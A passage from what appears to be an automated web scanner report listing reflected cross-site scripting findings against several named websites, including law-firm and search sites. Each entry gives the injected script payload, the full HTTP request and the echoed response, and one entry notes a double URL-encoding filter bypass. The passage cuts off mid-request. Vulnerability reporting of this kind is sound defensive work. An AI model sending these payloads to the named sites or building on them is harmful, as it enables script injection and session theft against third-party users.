Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A66
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1188; path=/
Set-Cookie: PortletId=1199201; path=/
Set-Cookie: SiteId=1039; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EDT&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=3pnj2rusybze5e45ktwtjc45; path=/; HttpOnly
Set-Cookie: CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 95510
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65c45525d5f4f58455e445a4a423660;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>

...[SNIP]...
<a href="javascript:void(0);" onclick="window.open('http://www.hoganlovells.com/newsmedia/fastfacts/?984c4"><script>alert(1)</script>9caa5b51498=1&print=true'); ">
...[SNIP]...

4.141. http://www.hoganlovells.com/newsmedia/newspubs [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hoganlovells.com
Path:   /newsmedia/newspubs

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff387"><script>alert(1)</script>f5129b0d7e4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /newsmedia/newspubs?ff387"><script>alert(1)</script>f5129b0d7e4=1 HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Sun, 17 Apr 2011 14:19:44 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1186; path=/
Set-Cookie: PortletId=1197201; path=/
Set-Cookie: SiteId=1039; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EDT&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=0afkoditkupm0a45bsb3rl55; path=/; HttpOnly
Set-Cookie: CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 259890
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>

...[SNIP]...
<a href="javascript:void(0);" onclick="window.open('http://www.hoganlovells.com/newsmedia/newspubs/?ff387"><script>alert(1)</script>f5129b0d7e4=1&print=true'); ">
...[SNIP]...

4.142. http://www.hoganlovells.com/newsmedia/newspubs/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hoganlovells.com
Path:   /newsmedia/newspubs/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ddef3"><script>alert(1)</script>32ec83aedd1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /newsmedia/newspubs/?ddef3"><script>alert(1)</script>32ec83aedd1=1 HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 17 Apr 2011 14:19:57 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1186; path=/
Set-Cookie: PortletId=1197201; path=/
Set-Cookie: SiteId=1039; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EDT&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=nqxi0l45ugjikt45htjgkszm; path=/; HttpOnly
Set-Cookie: CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 259890
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>

...[SNIP]...
<a href="javascript:void(0);" onclick="window.open('http://www.hoganlovells.com/newsmedia/newspubs/?ddef3"><script>alert(1)</script>32ec83aedd1=1&print=true'); ">
...[SNIP]...

4.143. http://www.hoganlovells.com/newsmedia/newspubs/List.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hoganlovells.com
Path:   /newsmedia/newspubs/List.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6781"><script>alert(1)</script>141a5cc1321 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /newsmedia/newspubs/List.aspx?f6781"><script>alert(1)</script>141a5cc1321=1 HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 17 Apr 2011 14:19:13 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1186; path=/
Set-Cookie: PortletId=1197201; path=/
Set-Cookie: SiteId=1039; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EDT&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=gnqers55ubowfiv34xrwdf55; path=/; HttpOnly
Set-Cookie: CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 166775
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>

...[SNIP]...
<a href="javascript:void(0);" onclick="window.open('http://www.hoganlovells.com/newsmedia/newspubs/List.aspx?f6781"><script>alert(1)</script>141a5cc1321=1&print=true'); ">
...[SNIP]...

4.144. http://www.hoganlovells.com/newsmedia/timeline/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hoganlovells.com
Path:   /newsmedia/timeline/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2644c"><script>alert(1)</script>bedf04dc077 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /newsmedia/timeline/?2644c"><script>alert(1)</script>bedf04dc077=1 HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 17 Apr 2011 14:19:07 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1189; path=/
Set-Cookie: PortletId=1200201; path=/
Set-Cookie: SiteId=1039; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EDT&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=fosfrm45vostudiwypgxb155; path=/; HttpOnly
Set-Cookie: CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 114381
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>

...[SNIP]...
<a href="javascript:void(0);" onclick="window.open('http://www.hoganlovells.com/newsmedia/timeline/?2644c"><script>alert(1)</script>bedf04dc077=1&print=true'); ">
...[SNIP]...

4.145. http://www.hoganlovells.com/ourpeople/List.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hoganlovells.com
Path:   /ourpeople/List.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec2f0"><script>alert(1)</script>2daf70c6706 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ourpeople/List.aspx?ec2f0"><script>alert(1)</script>2daf70c6706=1 HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 17 Apr 2011 14:23:27 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1075; path=/
Set-Cookie: PortletId=13201; path=/
Set-Cookie: SiteId=1039; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EDT&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=sbdibi45oqlx1b45piq0vq45; path=/; HttpOnly
Set-Cookie: CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 2627156
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>

...[SNIP]...
<a href="javascript:void(0);" onclick="window.open('http://www.hoganlovells.com/ourpeople/List.aspx?ec2f0"><script>alert(1)</script>2daf70c6706=1&print=true'); ">
...[SNIP]...

4.146. http://www.hollerclassic.com/smartbrowse/ajax/used.htm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hollerclassic.com
Path:   /smartbrowse/ajax/used.htm

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c79e4"><script>alert(1)</script>00e92029aec was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /smartbrowsec79e4"><script>alert(1)</script>00e92029aec/ajax/used.htm?detect=false&reset=InventoryListing&showYear=true&showMake=true&showModel=true&showAllModels=false&showTrim=false&showBodyStyle=false&showMileage=false&showPrice=true&showLocation=false&showHighywayMpgs=false HTTP/1.1
Host: www.hollerclassic.com
Proxy-Connection: keep-alive
Referer: http://www.hollerclassic.com/index.htm
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=63dda7ab0a0a002f017f2dac183a097c; JSESSIONID=8klanm5n1qr6h; ddcpoolid=CmsPoolP; __utmz=193517236.1303050588.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/36; __utma=193517236.1979268532.1303050588.1303050588.1303050588.1; __utmc=193517236; __utmb=193517236.1.10.1303050588

Response

HTTP/1.1 404 Not Found
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 13798
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 14:30:00 GMT
Connection: close

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms14.dealer.ddc p7072 -->

   <title> | New Audi, Chevrolet, Honda, Hummer, Hyundai, Mazda dealership in Winter Park, FL 32789
...[SNIP]...
<img src="http://hits.dealer.com/clear.gif?&amp;4=0&amp;5=0&amp;10=http://www.google.com/search?hl=en&q=18a7b'-alert(document.cookie)-'9a5e8f0fc61&amp;20=www.hollerclassic.com&amp;21=/smartbrowsec79e4"><script>alert(1)</script>00e92029aec/ajax/used.htm&amp;50=63dda7ab0a0a002f017f2dac183a097c&amp;51=&amp;52=&amp;53=&amp;54=en_US&amp;55=173.193.214.243&amp;56=&amp;60=&amp;61=&amp;64=&amp;58=&amp;59=&amp;80=&amp;81=&amp;82=&amp;83=&amp;62
...[SNIP]...

4.147. http://www.hollerclassic.com/smartbrowse/ajax/used.htm [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hollerclassic.com
Path:   /smartbrowse/ajax/used.htm

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ab29"><script>alert(1)</script>cc275c6ab53 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /smartbrowse/ajax5ab29"><script>alert(1)</script>cc275c6ab53/used.htm?detect=false&reset=InventoryListing&showYear=true&showMake=true&showModel=true&showAllModels=false&showTrim=false&showBodyStyle=false&showMileage=false&showPrice=true&showLocation=false&showHighywayMpgs=false HTTP/1.1
Host: www.hollerclassic.com
Proxy-Connection: keep-alive
Referer: http://www.hollerclassic.com/index.htm
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=63dda7ab0a0a002f017f2dac183a097c; JSESSIONID=8klanm5n1qr6h; ddcpoolid=CmsPoolP; __utmz=193517236.1303050588.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/36; __utma=193517236.1979268532.1303050588.1303050588.1303050588.1; __utmc=193517236; __utmb=193517236.1.10.1303050588

Response

HTTP/1.1 404 Not Found
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 13798
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 14:30:01 GMT
Connection: close

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms14.dealer.ddc p7072 -->

   <title> | New Audi, Chevrolet, Honda, Hummer, Hyundai, Mazda dealership in Winter Park, FL 32789
...[SNIP]...
<img src="http://hits.dealer.com/clear.gif?&amp;4=0&amp;5=0&amp;10=http://www.google.com/search?hl=en&q=18a7b'-alert(document.cookie)-'9a5e8f0fc61&amp;20=www.hollerclassic.com&amp;21=/smartbrowse/ajax5ab29"><script>alert(1)</script>cc275c6ab53/used.htm&amp;50=63dda7ab0a0a002f017f2dac183a097c&amp;51=&amp;52=&amp;53=&amp;54=en_US&amp;55=173.193.214.243&amp;56=&amp;60=&amp;61=&amp;64=&amp;58=&amp;59=&amp;80=&amp;81=&amp;82=&amp;83=&amp;62-0=10
...[SNIP]...

4.148. http://www.info.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.info.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c4beb'><a>13945db1d18 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /?c4beb'><a>13945db1d18=1 HTTP/1.1
Host: www.info.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: Z=YOYLQIS74.205.26.218CKMLM; path=/
Date: Sun, 17 Apr 2011 14:19:46 GMT
Server: Apache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 17819

<html><head>
       <title>Info.com - Search the Web</title>
   <meta name=keywords content="Info,information,Search,Searches,Searching,Searchers,Advanced search,Search Help,Search guide,Search tips,Search t
...[SNIP]...
<img src='http://info.intelli-direct.com/e/t3.dll?280&0&%20&qcat%3DWeb%26itpage%3D?c4beb'><a>13945db1d18=1&iREGQry&iSale&0&0&0&0&0&0&%20&1500&%20&0' height=1 width=1 border=0>
...[SNIP]...

4.149. http://www.info.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.info.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9857d"-alert(1)-"1634c822576 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?9857d"-alert(1)-"1634c822576=1 HTTP/1.1
Host: www.info.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: Z=YOYLQIS74.205.26.219CKMLO; path=/
Date: Sun, 17 Apr 2011 14:19:47 GMT
Server: Apache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 17824

<html><head>
       <title>Info.com - Search the Web</title>
   <meta name=keywords content="Info,information,Search,Searches,Searching,Searchers,Advanced search,Search Help,Search guide,Search tips,Search t
...[SNIP]...
<!--
var pqry="qcat%3DWeb%26itpage%3D?9857d"-alert(1)-"1634c822576=1";var rqry="iREGQry";var sqry="iSale";var dt=window.document,nr=navigator,ina=nr.appName,sr="0&0",px=0,sv=10,je=0; var inav=nr.appVersion,iie=inav.indexOf('MSIE '),intp=(ina.indexOf('Netscape')>
...[SNIP]...

4.150. http://www.info.com/washington%20dc%20law%20firms [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.info.com
Path:   /washington%20dc%20law%20firms

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 436a5%253cscript%253ealert%25281%2529%253c%252fscript%253ed23057a9ce0 was submitted in the REST URL parameter 1. This input was echoed as 436a5<script>alert(1)</script>d23057a9ce0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /washington%20dc%20law%20firms436a5%253cscript%253ealert%25281%2529%253c%252fscript%253ed23057a9ce0 HTTP/1.1
Host: www.info.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: Z=YOYLQIS74.205.26.218CKMLM; path=/
Date: Sun, 17 Apr 2011 14:20:35 GMT
Server: Apache
Set-Cookie: a=newwindow+1+dpcollation_web+1+lang+0+familyfilter+1+bold+1+msRecentSearches+off+autocorrect+0+domain+infocom+ts+1303050035+last_cmp++engineset+int-only; expires=Thu, 16-Apr-2037 21:28:31 GMT; path=/; domain=.info.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 40031

<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>Info.com - washington dc law firms436a5%3cscript%3ealert%281%29%3c%2fscript%3ed23057a9ce0 - www.Info.com</title><l
...[SNIP]...
<a href="http://Info.com/searchw?qkw=washington+dc+law+firms+436a5%3Cscript%3Ealert%281%29%3C%2Fscript%3Ed23057a9ce0&r_cop=spell" style="text-decoration:underline">washington dc law firms 436a5<script>alert(1)</script>d23057a9ce0</a>
...[SNIP]...

4.151. http://www.jonesdaydiversity.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.jonesdaydiversity.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5d198'-alert(1)-'69c20afbe3b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?5d198'-alert(1)-'69c20afbe3b=1 HTTP/1.1
Host: www.jonesdaydiversity.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 17 Apr 2011 14:14:45 GMT
Server: Microsoft-IIS/6.0
X-UA-Compatible: IE=EmulateIE7
x-geoloc: 02
x-client: 000610
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A38
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1389; path=/
Set-Cookie: PortletId=6605501; path=/
Set-Cookie: SiteId=1383; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=fcj5d3imp2gaac3js0iubt32; path=/; HttpOnly
Set-Cookie: CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1036&RootPortletID=616&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=FCW; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 9869
Set-Cookie: NSC_MC_KpoftEbz_b37b38_IUUQ=ffffffff09d5f63e45525d5f4f58455e445a4a423660;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>

<head>
<title id="ctl00_htmlTitle">Jones Day Diversity</title>
<link rel="stylesheet"
...[SNIP]...
<![CDATA[
var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/Home.aspx?5d198'-alert(1)-'69c20afbe3b=1';//]]>
...[SNIP]...

4.152. http://www.jumptags.com/add/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.jumptags.com
Path:   /add/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6bfaa"><script>alert(1)</script>8d9f2554263 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /add/?6bfaa"><script>alert(1)</script>8d9f2554263=1 HTTP/1.1
Host: www.jumptags.com
Accept: */*
Accept-Language: en
